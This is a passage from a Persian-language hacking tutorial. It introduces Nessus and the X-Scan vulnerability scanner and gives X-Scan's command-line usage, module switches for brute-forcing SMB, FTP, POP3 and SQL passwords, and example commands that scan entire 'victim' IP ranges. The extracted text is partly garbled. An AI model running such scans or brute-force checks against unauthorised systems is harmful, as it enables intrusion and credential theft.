ﮐﺮد‪.‬‬ ‫اﺏﺰار ‪: Nessus‬‬ ‫ﺏﺮﻧﺎﻣﻪ ﮐﺪ ﺏﺎزی اﺱﺖ و اﻟﺒﺘﻪ رایﮕﺎن و یﮑﯽ از ﺏﻬﺘﺮیﻦ ایﻦ اﺏﺰارهﺎ ‪ ،‬ﮐﻪ اﻟﺒﺘﻪ ﮐﺎرایﯽ ﺏﺴﻴﺎر ﻋﺎﻟﯽ دارد ﮐﻪ ﻣﺘﺄﺱﻔﺎﻧﻪ روی ویﻨﺪوز اﺟ ﺮا ﻧﻤ ﯽ ﺷ ﻮد‬ ‫و ﺏﺮای ﺱﻴﺴﺘﻢ هﺎی ﻟﻴﻨﻮﮐﺲ اﺱﺖ )ایﻦ را ﺏﮕﻮیﻢ ﮐﻪ اﮔﺮ زﻣﺎﻧﯽ ﺏﻮد ﻧﺮم اﻓﺰارهﺎ ﻣﺎﺷﻴﻦ ﻣﺠﺎزی و ﺷﺒﻪ ﺱﺎز ﻟﻴﻨﻮﮐﺲ را ﺕﻮﺽﻴﺢ ﻣﻴ ﺪهﻢ(‪ .‬اﻟﺒﺘ ﻪ ﭼ ﺮا‬ ‫ﻣﻦ دروغ ﺏﮕﻮیﻢ ﺏﺎ ایﻨﮑﻪ ﻓﻮق اﻟﻌﺎدﻩ اﺱﺖ ﻣﻦ اﺻﻼ از ﺁن ﺧﻮﺷﻢ ﻧﻤﯽ ایﺪ‪ .‬ایﻦ را ﺏﮕﻮیﻢ ﮐﻪ ﺟﺪیﺪًا ) یﮑﯽ دو ﺱﺎل هﻤﺶ( ﺷﺮﮐﺖ ‪ Tenable‬ﻧ ﺴﺨﻪ‬ ‫ویﻨﺪوز ﺁن را ﺏﺎ ﻧﺎم ‪ NeWT Security Scanner‬اﻧﺘﺸﺎر دادﻩ اﺱﺖ اﻟﺒﺘﻪ ایﻦ ﺷﺮﮐﺖ ﻧﮕﺮﻓﺘﻪ ﮐﺪ ه ﺎ را دوﺏ ﺎرﻩ ﺏ ﺮای ویﻨ ﺪوز ﺏﻨﻮی ﺴﺪ ﺏﻠﮑ ﻪ ﺷ ﻴﻮﻩ‬ ‫ﻧﮕﺎرش ‪ Plug-in‬هﺎ را ﺏﺎ ﻧﻮﺷﺘﻦ یﮏ ﺏﺮﻧﺎﻣﻪ ﺽﻌﻴﻒ ﺏﻪ ویﻨﺪوز ﺡﺎﻟﯽ ﮐﺮدﻩ اﺱﺖ‪ .‬ایﻦ را ﻣﻴﺪاﻧﻴﺪ ﮐﻪ ‪ scripts‬هﺎی ای ﻦ ﺏﺮﻧﺎﻣ ﻪ ‪ Nessus‬از زﺏ ﺎن‬ ‫ﺧﺎص ﺧﻮدش ﺏﺎ ﻧﺎم ‪ Nessus Attack Scripting Language‬ﮐﻪ ﺏﻪ ﺻﻮرت ‪ NSAL‬ﮔﻔﺘ ﻪ ﻣﻴ ﺸﻮد و ﭘ ﺴﻮﻧﺪ اﺱ ﮑﺮیﭙﺖ ه ﺎی ﭘ ﻼگ ایﻨﻬ ﺎ ﻧﻴ ﺰ‬ ‫هﺴﺘﻨﺪ را ﺏﺎ اﺱﺘﻔﺎدﻩ از ﺏﺮﻧﺎﻣﻪ ﺽﻌﻴﻒ ﺧﻮد یﮏ ﺟﻮر ﺁی ﯽ ﺡ ﺎﻟﯽ ویﻨ ﺪوز ﮐ ﺮدﻩ اﻟﺒﺘ ﻪ ای ﻦ ﺏﺮﻧﺎﻣ ﻪ ﮐ ﺎر ﺏ ﺎ ﺁن ﺱ ﺎدﻩ اﺱ ﺖ وﻟ ﯽ ﻧ ﺴﺨﻪ ﻣﻌﻤ ﻮﻟﯽ ﮐ ﻪ در‬ ‫ﺱﺎیﺖ ﮔﺬاﺷﺘﻪ ﻓﻘﻂ ﻣﻴﺘﻮاﻧﺪ ﮐﺎﻣﭙﻴﻮﺕﺮ ﺧﻮدﺕﺎن را ﭘﻮیﺶ ﮐﻨﺪ ﻧﻪ ‪ IP‬هﺎی ﮐﻼس ‪ C‬را ﮐﻪ ایﻦ ﺏﺮﻧﺎﻣﻪ ﺧﻮدش ﮔﻔﺘﻪ ﻣﻦ هﺮ ﭼﯽ ﮔﺸﺘﻢ ﻧﺴﺨﻪ ﺡﺮﻓ ﻪ ای ﺁن‬ ‫را ﮐﻪ ﺏﺮاش ﺕﺒﻠﻴﻎ ﻣﻴﮑﻨﺪ ﭘﻴﺪا ﻧﮑﺮدم وﻟﯽ ﺏﺎ ایﻦ ﺡﺎل ایﻦ را هﻢ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ‪ .‬یﮏ ﺏﺮﻧﺎﻣ ﻪ دیﮕ ﺮ ﺏ ﺮای ﭘ ﻮیﺶ ﻧﻘ ﺎط ﺁﺱ ﻴﺐ ﭘ ﺬیﺮ ه ﺴﺖ ﮐ ﻪ ﮐ ﺎرایﯽ‬ ‫ﺧ ﻮﺏﯽ ﻧﻴ ﺰ دارد و از ‪ scripts‬ه ﺎی ﺏﺮﻧﺎﻣ ﻪ ‪ Nessus‬اﺱ ﺘﻔﺎدﻩ ه ﻢ ﻣﻴﮑﻨ ﺪ ﺏﺮﻧﺎﻣ ﻪ ‪ X-Scan‬اﺱ ﺖ ﮐ ﻪ از ایﻨﺠ ﺎ ﻣﻴﺘﻮاﻧﻴ ﺪ دریﺎﻓ ﺖ ﮐﻨﻴ ﺪ ﺁن را و ﻣ ﻦ‬ ‫ﺕﻮﺻﻴﻪ ﻣﻴﮑﻨﻢ از ایﻦ ﺡﺘﻤﺎ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﭼﻮن ﺧﻮدش یﮏ ﻧﻮع ‪ Nessus‬ﺏﺮای ویﻨﺪوز و ﮐﺎرای ﺁن ﻣﺎﻓﻮق ﻓﻮق اﻟﻌﺎدﻩ اﺱﺖ‪ .‬ای ﻦ ی ﮏ ﺕﻮﺽ ﻴﺢ ﺏ ﺪهﻢ‬ ‫ﮐﻪ ﺏﺮﻧﺎﻣﻪ ‪ Nessus‬ﭼﻮن از زﺏﺎن ﺏﺮﻧﺎﻣﻪ ﻧﻮیﺴﯽ ﺧﺎص ﺧﻮدش ﮐﻪ ﺏﺎﻻ ﮔﻔﺘﻢ اﺱﺘﻔﺎدﻩ ﻣﯽ ﮐﻨﺪ ) ﺏﺮای ‪ scripts‬هﺎ ‪ ،‬ﮐﻼ ‪ scripts‬ﺏ ﻪ ﮐ ﺪ ه ﺎی ﮐ ﺸﻒ‬ ‫ﺡﻔﺮﻩ هﺎی اﻣﻨﻴﺘﯽ ﻣﻴﮕﻮیﻨﺪ ﮐﻪ ﭘﺴﻮﻧﺪ ﺁﻧﻬ ﺎ ‪ NSLA‬ﺏ ﺮای ﺏﺮﻧﺎﻣ ﻪ ‪ Nessus‬اﺱ ﺖ و ﺏﺮﻧﺎﻣ ﻪ ه ﺎیﯽ ﮐ ﻪ از ای ﻦ ﻧ ﻮع ‪ scripts‬ه ﺎ اﺱ ﺘﻔﺎدﻩ ﮐﻨ ﺪ ﺕﻮاﻧ ﺎیﯽ‬ ‫ﻣﺸﺎﺏﻪ ﻧﺮم اﻓﺰار ‪ Nessus‬ﺏﺮای ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی اﻣﻨﻴﺘﯽ ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ هﺴﺘﻨﺪ ( و ﻣﻨﺒﻊ ﺏﺎز اﺱ ﺖ ﺁﻧﻘ ﺪر ﻣ ﺸﻬﻮر اﺱ ﺖ اﻟﺒﺘ ﻪ ﺏ ﻪ ﺡ ﻖ ﻧﻴ ﺰ اﺱ ﺖ و ﻣ ﻦ‬ ‫ﻣﻨﮑﺮ ﺁن ﻧﻴﺴﺘﻢ هﻤﺎﻧﻄﻮر ﮐﻪ ﮔﻔﺘﻢ ﺏﻬﺘﺮ اﺱﺖ از ﺏﺮﻧﺎﻣﻪ ‪ X-Scan‬در ویﻨﺪوز اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ ﮐﻪ ﻣﺠﺎﻧﯽ ه ﻢ اﺱ ﺖ‪ .‬ای ﻦ را اﺽ ﺎﻓﻪ ﮐ ﻨﻢ ﮐ ﻪ ﺏﺮﻧﺎﻣ ﻪ ه ﺎی‬ ‫زیﺎدی دیﮕﺮ ﺡﺎﻻ ﺏﺮای ویﻨﺪوز ﻣﻨﺘﺸﺮ ﺷﺪﻩ ﮐﻪ از ‪ scripts‬ه ﺎی ‪ Nessus‬ﺏ ﺮای ﭘ ﻮیﺶ ﺡﻔ ﺮﻩ ه ﺎی اﺱ ﻴﺐ ﭘ ﺬیﺮی ﻗﺮﺏ ﺎﻧﯽ اﺱ ﺘﻔﺎدﻩ ﻣﻴﮑﻨ ﺪ ﺏ ﻪ هﻤ ﻴﻦ‬ ‫ﺧﺎﻃﺮ ﺏﺮ ﺏﭽﻪ هﺎی ﺏﺮﻧﺎﻣﻪ ﻧﻮیﺲ ﻧﺮﻓﺘﻦ ﻧﺴﺨﻪ ویﻨﺪوز ایﻦ ﺏﺮﻧﺎﻣﻪ را ﻣﺜﻞ ‪ Nmap‬درﺱﺖ ﮐﻨﻨ ﺪ ی ﮏ ذرﻩ دﻧﺒ ﺎل ﺏﮕﺮدی ﺪ ﺡﺘﻤ ﺎ ﻧﺮﻣﺎﻓﺰاره ﺎی ﺏﻬﺘ ﺮی‬ ‫را ﭘﻴﺪا ﻣﻴﮑﻨﻴﺪ‪.‬‬ ‫ﻧﺴﺨﻪ ویﻨﺪوز‪ Nessus‬ﺏﺮﻧﺎﻣﻪ ‪: X-Scan‬‬ ‫ﻣﻘﺪﻣﻪ ﺏﺮﻧﺎﻣﻪ ‪:‬‬ ‫ﺧﻮب ایﻦ ﺏﺮﻧﺎﻣﻪ از ﺕﻴﻢ ‪ xfocus‬اﺱﺖ ﮐﻪ ﺟﺰو اوﻟﻴﻦ ﺏﺮﻧﺎﻣﻪ هﺎیﯽ ﺏﻮد ﺏﺮای ویﻨﺪوز ﮐﻪ از ‪ scripts‬هﺎی ‪ Nessus‬ﺏﺮای ﭘﻮیﺶ ﺡﻔ ﺮﻩ ه ﺎی اﺱ ﻴﺐ‬ ‫ﭘﺬیﺮی ﻗﺮﺏﺎﻧﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﺮد و ﮐﺎرایﯽ ﺧﻮﺏﯽ هﻢ دارد ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴﺪ ﻧﺴﺨﻪ ‪ ٣٫١‬ﺁن را از ﺏﺎﻻ دریﺎﻓﺖ ﮐﻨﻴﺪ ایﻦ ﺏﺮﻧﺎﻣﻪ ﻧﻴﺎزی ﺏﻪ ﻧﺼﺐ ﻧ ﺪارد و ﺏﻌ ﺪ‬

٤٢

‫ﺻﻔﺤﻪ‬

!! ‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم‬

‫ ه ﺎ ﻣﻴﺘﻮاﻧﻴ ﺪ از ﺏﺮﻧﺎﻣ ﻪ‬scripts ‫ ﺏ ﻪ هﻤ ﺮاﻩ دارد ﺏ ﺮای دریﺎﻓ ﺖ ﺟﺪی ﺪ ﺕ ﺮیﻦ‬scripts ٣٧١٣ ‫از ﺧﺎرج ﮐﺮدن ﺁن از ﺡﺎﻟﺖ ﻓﺸﺮدﻩ ﺏﻪ هﻤ ﺮاﻩ ﺧ ﻮدش‬ : ‫ ( راﺏﻂ ﮐﺎرﺏﺮی اش ایﻦ ﺷﮑﻠﯽ‬X-Scan )‫ ایﻦ ﺏﺮﻧﺎﻣﻪ‬.‫ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﺪ‬Update.exe ‫هﻤﺮاﻩ ﺧﻮدش ﺏﻪ ﻧﺎم‬

‫ ﮐﻪ ﮐﺎر ﺏ ﺎ را ﺱ ﺎدﻩ ﻣ ﯽ ﮐﻨ ﺪ ﺏ ﺮای ﺕ ﺎزﻩ ﮐﺎره ﺎ و ه ﻢ دارای ی ﮏ ﻧ ﺴﺨﻪ‬xscan_gui ‫ دارای یﮏ راﺏﻂ ﮐﺎرﺏﺮی ﺱﺎدﻩ اﺱﺖ ﺏﻪ ﻧﺎم‬X-Scan ‫ﺏﺮﻧﺎﻣﻪ‬ ‫ ﮐ ﻪ ﺏﻌ ﺪ از اﺟ ﺮای ﺁن در ﺧ ﻂ ﻓﺮﻣ ﺎن ای ﻦ‬.‫ ﮐ ﻪ ﻣ ﻦ ﻧ ﺴﺨﻪ ﺧ ﻂ ﻓﺮﻣ ﺎن را دوﺱ ﺖ دارم ﻣﻠ ﯽ ه ﻴﭻ ﻓﺮﻗ ﯽ ﺏ ﺎ ه ﻢ ﻧﻤ ﯽ ﮐﻨ ﺪ‬Xscan ‫ﺧﻂ ﻓﺮﻣﺎن ﺏﻪ ﻧﺎم‬ :‫ﻣﺸﺎهﺪﻩ ﻣﯽ ﮐﻨﻴﺪ‬ C:\X-Scan-v3.1>xscan.exe Usage: xscan -host <startIP>[-<endIP>] <module> [option] xscan -file <module> [option] <module> means: -active : check if the target host is active -port : check the status of tcp port -smb : check NT-Server weak password -netbios : check Netbios information -snmp : check SNMP information -os : check target OS version -ftp : check FTP-Server weak password -pub : Check anonymous pub write permission -pop3 : check POP3-Server weak password -smtp : check SMTP-Server vulnerability -sql : check SQL-Server weak password -iis : check IIS encode/decode vulnerability -cgi : check cgi vulnerability -nasl : load Nessus Attack Scripts -all : check all vulnerability [option] means: -i : set network interface -l: list network interface to get the -v: display verbose information -p: skip host when no response -o: skip host when no opened port be found -t : specify the maximal thread count and host count, default is 100,10 -log : specify the report filename, text or html format Example: xscan -host xxx.xxx.1.1-xxx.xxx.254.254 -all xscan -host xxx.xxx.1.1-xxx.xxx.254.254 -port -smb -p -t 100 xscan -file host.lst -port -cgi -t 100,5 -v -o

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٤٣‬‬

‫ﻧﺴﺨﻪ ﺧﻂ ﻓﺮﻣﺎن اﺟﺎزﻩ ﺏﻴﺸﺘﺮی ﺏﻪ ﻣﺎ ﺏﺮای ﮐﻨﺘﺮل ﺏﺮﻧﺎﻣﻪ ﻣﻴﺪهﺪ ﮐﻪ اﻟﺒﺘﻪ ﻓﮑﺮ ﮐﻨﻢ ﺷﻤﺎ دوﺱﺘﺎن ﺕﺎزﻩ ﮐﺎر ﺧﻮﺷﺘﺎن ﻧﻤﯽ ﺁیﺪ از ﺁن و یﺎ ﺏﻬﺘ ﺮ ﺏﮕ ﻢ ﮐ ﻪ‬ ‫اﺻﻼ از ﺏﺮﻧﺎﻣﻪ هﺎی ﺧﻂ ﻓﺮﻣﺎن ‪ ،‬وﻟﯽ ﺏﺎور ﮐﻨﻴﺪ ﮐﻪ ﺏﺮﻧﺎﻣﻪ هﺎی ﺧﻂ ﻓﺮﻣﺎن دارای ﭘﺎیﺪاری ﺏﻬﺘﺮ و ﺟ ﻮاب ه ﺎی ﺻ ﺤﻴﺢ ﺕ ﺮی ه ﺴﺘﻨﺪ ﭼ ﻮن ﻧ ﺴﺨﻪ‬ ‫هﺎی ﮔﺮاﻓﻴﮑﯽ در ویﻨﺪوز در ﺻﻮرت ﮐﻤﺒﻮد ﺡﺎﻓﻈﻪ ﮐﻪ ﻣﺜﻼ ﺏ ﺎ ﺏ ﺎﻻ ﺁﻣ ﺪن ی ﮏ ﺏﺮﻧﺎﻣ ﻪ و ﭘ ﺮ ﺷ ﺪن " ﭘ ﺸﺘﻪ " ﻣﻤﮑ ﻦ اﺱ ﺖ ی ﮏ ﺱ ﺮی از اﻃﻼﻋ ﺎت‬ ‫هﻤﺎن ﻟﺤﻈﻪ را از دﺱﺖ ﺏﺪهﻨﺪ و‪ ...‬ﭘﺲ ﺏﻬﺘﺮ اﺱﺖ از ﺧﻂ ﻓﺮﻣﺎن اﺱ ﺘﻔﺎدﻩ ﮐﻨ ﻴﻢ‪ .‬ای ﻦ را اﺽ ﺎﻓﻪ ﮐ ﻨﻢ ﮐ ﻪ راﺏ ﻂ ﮐ ﺎرﺏﺮ)‪ (xscan_gui‬ﻓﻘ ﻂ ی ﮏ راﺏ ﻂ‬ ‫اﺱﺖ ﻧﻪ ﺧﻮد ﺏﺮﻧﺎﻣﻪ ﭼﻮن ﺷﻤﺎ ﺏﺎ ﺕﻨﻈﻴﻢ ﺁن و ﺷﺮوع ﭘﻮیﺶ ایﻦ ﺏﺮﻧﺎﻣﻪ ﻣﻌﺎدل هﻤﺎن ﭘﻴﮑﺮ ﺏﻨﺪی را ﺏﺮای ﻧﺴﺨﻪ ﺧﻂ ﻓﺮﻣﺎن ایﺠﺎد ﮐﺮدﻩ و ﺏﺮﻧﺎﻣﻪ ﺧ ﻂ‬ ‫ﻓﺮﻣﺎن را در ﭘﺸﺖ ﺽﻤﻴﻤﻪ اﺟﺮا ﻣﻴﮑﻨﺪ‪ .‬و ﺟﻮاﺏﻬﺎ را دوﺏﺎرﻩ از ﺏﺮﻧﺎﻣﻪ ﺧﻂ ﻓﺮﻣﺎن ﻣﻴﮕﻴﺮد و ﺏﻪ ﺻﻮرت ﮔﺮاﻓﻴﮑﯽ ﺏﻪ ﻣﺎ ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ‪.‬‬ ‫اوﻟﻴﻦ ﻧﺴﺨﻪ ایﻦ ﺏﺮﻧﺎﻣﻪ ﻣﺎل ‪ ٢٠٠٠/١٢/١٢‬ﺏﻮد ﺁﺧﺮیﻦ ﻧﺴﺨﻪ اش ﮐﻪ اﻻن ﻓﮑﺮ ﻣﻴﮑﻨﻢ هﻤﺎن ‪ ٣٫١‬ﺏﺎﺷﺪ ﻣﺎل ‪ ٢٠٠۴/٣/٢۵‬اﺱﺖ‪.‬‬ ‫ﺷﮑﻞ ﻋﻤﻮﻣﯽ دﺱﺘﻮرات در ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ دو ﺷﮑﻞ زیﺮ اﺱﺖ ‪:‬‬ ‫]‪C:\>xscan -host <startIP>[-<endIP>] <module> [option‬‬ ‫]‪C:\>xscan -file <module> [option‬‬ ‫ﺧﻮب هﻤﻪ ﭼﻴﺰ ﮐﺎﻣﻼ واﺽﺢ اﺱﺖ‪ .‬ﺏﻪ ﺟﺎی ]>‪ <startIP>[-<endIP‬ﺷﻤﺎ ‪ IP‬یﺎ ‪ IP‬هﺎی ﻗﺮﺏﺎﻧﯽ را ﻣﻴﻨﻮیﺴﻴﺪ‪ .‬ﺏﻪ ﺟﺎی >‪ <module‬هﻢ یﮑﯽ ی ﺎ‬ ‫ﻣﺨﻠﻮﻃﯽ از ﺱﻮیﭻ هﺎی ﺟﺪول ﺷﻤﺎرﻩ ‪ ١‬را ﻣﻴﻨﻮیﺴﻴﻢ‪ .‬و ﺏﻪ ﺟﺎی ]‪ [option‬هﻢ اﮔﺮ ﻻزم داﻧﺴﺘﻴﺪ یﮑﯽ از ﺱﻮیﭻ هﺎی ﺟﺪول ﺷﻤﺎرﻩ دو را ﻣﻴﻨﻮیﺴﻴﺪ‪.‬‬ ‫ﺟﺪول ﺷﻤﺎرﻩ ‪: ١‬‬ ‫‪١‬‬

‫ﺱﻮیﭻ‬ ‫‪-active‬‬

‫‪٢‬‬

‫‪-port‬‬

‫‪٣‬‬

‫‪-smb‬‬

‫‪۴‬‬

‫‪-netbios‬‬

‫‪۵‬‬ ‫‪۶‬‬

‫‪-snmp‬‬ ‫‪-OS‬‬

‫‪٧‬‬

‫‪-ftp‬‬

‫‪٨‬‬

‫‪-pub‬‬

‫‪٩‬‬

‫‪-POP3‬‬

‫‪١٠‬‬

‫‪-smtp‬‬

‫‪١١‬‬

‫‪-sql‬‬

‫‪١٢‬‬

‫‪-iis‬‬

‫‪١٣‬‬

‫‪-cgi‬‬

‫‪١۴‬‬ ‫‪١۵‬‬

‫‪-nasl‬‬ ‫‪-all‬‬

‫ﺕﻮﺽﻴﺤﺎت‬ ‫ﺏﺮای ایﻦ اﺱﺖ ﮐﻪ درک ﮐﻨﺪ ﺁیﺎ ایﻦ ‪ IP‬ﮐﻪ ﺷﻤﺎ ﺏﻪ ﺏﺮﻧﺎﻣﻪ دادیﺪ ﺁیﺎ ﺏﺎﻻ اﺱﺖ یﺎ ﻧﻪ‪ .‬یﮏ ﺟﻮر‬ ‫هﺎیﯽ هﻤﺎن ﻋﻤﻞ ‪ Ping‬را اﻧﺠﺎم ﻣﻴﺪهﺪ‪ ).‬وﻗﺘﯽ یﮏ رﻧﺞ ‪ IP‬را ﺏﻪ ﺏﺮﻧﺎﻣﻪ ﻣﻴﺪهﻴﺪ ﺧﻴﻠﯽ ﻣﻔﻴﺪ‬ ‫اﺱﺖ (‬ ‫وﺽﻌﻴﺖ ﭘﻮرت هﺎی ‪ TCP‬را یﮏ ﻧﮕﺎهﯽ ﻣﻴﮑﻨﺪ‪ .‬ﻓﮑﺮ ﮐﻨﻢ از ﻣﮑﺎﻧﻴﺰم ﭘﺎ ﺕﮑﺎﻧﯽ ‪ ٣‬ﻣﺮﺡﻠﻪ ایﯽ‬ ‫اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ‪ .‬و اﻟﺒﺘﻪ ﻣﮑﺎﻧﻴﺰم ‪ SYN‬را هﻢ ﭘﺸﺘﻴﺒﺎﻧﯽ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ﺏﺮای ﺏﺪﺱﺖ ﺁوردن ﮐﻠﻤﻪ هﺎی ﻋﺒﻮر اﺷﺘﺮاک هﺎی ﭘﺮوﺕﮑﻞ ‪ SMB‬ﮐﻪ ﺏﻌﺪا ﮐﺎﻣﻞ ﺕﻮﺽﻴﺢ‬ ‫ﻣﻴﺪهﻢ یﮏ ﺱﺮی ﺕﻼش اﺱﺎﺱﯽ ﻣﻴﮑﻨﺪ‪ .‬و اﻟﺒﺘﻪ ایﻦ راهﻢ ﺏﮕﻢ ﮐﻪ ﺏﺮای ﺡﻔﺮﻩ هﺎی ﻣﻮﺟﺪ در ایﻦ‬ ‫ﭘﺮوﺕﮑﻞ هﻢ ﭘﻮیﺶ ﻣﻴﮑﻨﺪ‪.‬‬ ‫یﮏ ﺱﺮی اﻃﻼﻋﺎت در ﺏﺎرﻩ ‪ NetBIOS‬ﺏﺪﺱﺖ ﻣﯽ ﺁورد‪ .‬اﻟﺒﺘﻪ در ﺻﻮرت ﻓﻌﺎل ﺏﻮدن ‪ ،‬ﮐﻪ‬ ‫در ایﻦ دورﻩ زﻣﺎﻧﻪ ﺏﺮای ﺱﺮور هﺎ ﺏﻌﻴﺪ اﺱﺖ ﮐﻪ اﺻﻼ ایﻦ ﺱﺮویﺲ ﻓﻌﺎل ﺏﺎﺷﺪ‪ .‬و اﻟﺒﺘﻪ ﺏﻪ‬ ‫دﻧﺒﺎل ﺡﻔﺮﻩ هﺎی ایﻦ ﭘﺮوﺕﮑﻞ هﻢ ﻣﻴﮕﺮدد‪.‬‬ ‫در ﺻﻮرت ﻓﻌﺎل ﺏﻮدن ایﻦ ﭘﺮوﺕﮑﻞ ﺏﺮای وﺟﻮد ﺡﻔﺮﻩ هﺎ ﺁن را ﭘﻮیﺶ ﻣﯽ ﮐﻨﺪ‪.‬‬ ‫ﺱﻌﯽ ﻣﻴﮑﻨﺪ ﺷﻤﺎرﻩ ﻧﺴﺨﻪ و اﻟﺒﺘﻪ ﺧﻮد و ﻧﻮع ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ را ﮐﺸﻒ ﮐﻨﺪ ﺏﻌﺪ از ‪ Nmap‬ﺧﻴﻠﯽ‬ ‫ﮐﺎراش درﺱﺖ اﺱﺖ و اﻟﺒﺘﻪ ﺏﺮای ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی ان ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ را یﮏ ﭘﻮیﺶ ﻧﻴﺰ) ﺏﺮای‬ ‫ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی ﻣﻮﺟﺪ در ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ ( ﻣﻴﮑﻨﺪ‪.‬‬ ‫ﺧﻮب هﻤﻪ ایﻦ ﭘﺮوﺕﮑﻞ را ﻣﻴﺸﻨﺎﺱﻨﺪ‪ .‬ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﺎ اﺱﺘﻔﺎدﻩ از ﻣﮑﺎﻧﻴﺰم ‪Brute‬‬ ‫‪ Force‬ﺱﻌﯽ ﻣﻴﮑﻨﺪ ﮐﻠﻤﻪ ﻋﺒﻮر را ﮐﺸﻒ ﮐﻨﺪ و اﻟﺒﺘﻪ ﺏﺮای ﺡﻔﺮﻩ هﺎ ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی ﻣﻮﺟﺪ در‬ ‫ایﻦ ﭘﺮوﺕﮑﻞ هﻢ ‪ ،‬یﮏ ﭘﻮیﺶ ﻣﻴﮑﻨﺪ‪.‬‬ ‫یﮏ ﺁزﻣﺎیﺸﯽ ﻣﻴﮑﻨﺪ ﺏﺒﻴﻨﺪ ﮐﻪ ﺁیﺎ ﺁن ﻣﺎﺷﻴﻦ اﺟﺎرﻩ دﺱﺘﺮﺱﯽ ﻧﺎﺷﻨﺎس )‪ (anonymous‬را ﺏﻪ ﻣﺎ‬ ‫ﻣﻴﺪهﺪ و اﻟﺒﺘﻪ ﺏﺎز هﻢ یﮏ ﺱﺮی ﭘﻮیﺶ ﺏﺮای ﮐﺸﻒ ﺡﻔﺮﻩ ﺁﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫ﺧﻮب ایﻦ ﭘﺮوﺕﮑﻞ ﮐﺸﺶ ﻧﺎﻣﻪ از ﺻﻨﺪوق ﭘﺴﺘﯽ اﻟﮑﺘﺮوﻧﻴﮏ اﺱﺖ‪ .‬ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ‬ ‫در ﺻﻮرت ﻓﻌﺎل ﺏﻮدن ایﻦ ﺱﺮویﺲ ﺏﺮﻧﺎﻣﻪ یﮏ ﺱﺮی ﭘﻮیﺶ ﺏﺮای ﮐﻒ ﺡﻔﺮﻩ هﺎ اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫ﺧﻮب ایﻦ هﻤﺎن ﭘﺮوﺕﮑﻞ ارﺱﺎل و دریﺎﻓﺖ ﭘﺴﺖ اﻟﮑﺘﺮوﻧﻴﮏ یﺎ هﻤﺎن ‪ E-Mail‬ﺧﻮدﻣﺎن اﺱﺖ‪.‬‬ ‫ﮐﻪ ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ یﮏ ﺱﺮی اﻃﻼﻋﺎت اﺱﺎس در ﺏﺎرﻩ ﺁن ﻣﻴﮕﻴﺮد و ایﻦ ﭘﺮوﺕﮑﻞ را‬ ‫ﺏﺮای وﺟﻮد ﺡﻔﺮﻩ هﺎ ﻣﻴﮕﺮدد‪.‬‬ ‫ﺧﻮب اﮔﺮ ﻣﺎﺷﻴﻦ ﻗﺮﺏﺎﻧﯽ از ایﻦ ﺱﺮویﺲ اﺱﺘﻔﺎدﻩ ﺏﮑﻨﺪ ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﺮﻧﺎﻣﻪ ﺏﺮای‬ ‫ﮐﺸﻒ ﺡﻔﺮﻩ هﺎی ﻣﻮﺟﺪ در ایﻦ ﺱﺮویﺲ یﮏ ﺕﻼﺷﯽ ﻣﻴﮑﻨﺪ‪.‬‬ ‫اﮔﺮ ﺷﻤﺎ ﻣﻴﺪاﻧﻴﺪ ﺱﺮویﺲ دهﻨﺪﻩ وب ایﻦ ﻣﺎﺷﻴﻦ از ﻧﻮع ‪ IIS‬در ﭘﻴﺖ ﻣﺎیﮑﺮوﺱﺎﻓﺖ اﺱﺖ ‪ ،‬ﺏﺎ‬ ‫اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺡﺘﻤﺎ )ﺏﺎﻻی ‪ (%٩٩٫٩٩٩٩‬ﺷﻤﺎ یﮏ ﺕﻌﺪادی ﺡﻔﺮﻩ ﻋﺎﻟﯽ ﮐﺸﻒ‬ ‫ﻣﻴﮑﻨﻴﺪ‪.‬‬ ‫اﮔﺮ ﻣﻴﺪاﻧﻴﺪ وب ﺱﺎیﺖ هﺪف از ﺕﻮاﺏﻊ ‪ CGI‬اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ ‪ ،‬ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﺮﻧﺎﻣﻪ‬ ‫یﮏ ﭘﻮیﺶ هﻢ درﺏﺎرﻩ ایﻦ ﺱﺮویﺲ اﻧﺠﺎم ﻣﻴﺪهﺪ ﺕﺎ ﺡﻔﺮﻩ هﺎی ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ را ﮐﺸﻒ ﮐﻨﺪ‪.‬‬ ‫ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ایﻦ ﺱﻮیﭻ ﺏﺮﻧﺎﻣﻪ از ‪ scripts‬هﺎی ﺏﺮﻧﺎﻣﻪ ‪ Nessus‬اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﺪ‪.‬‬ ‫ایﻦ ﺱﻮیﭻ 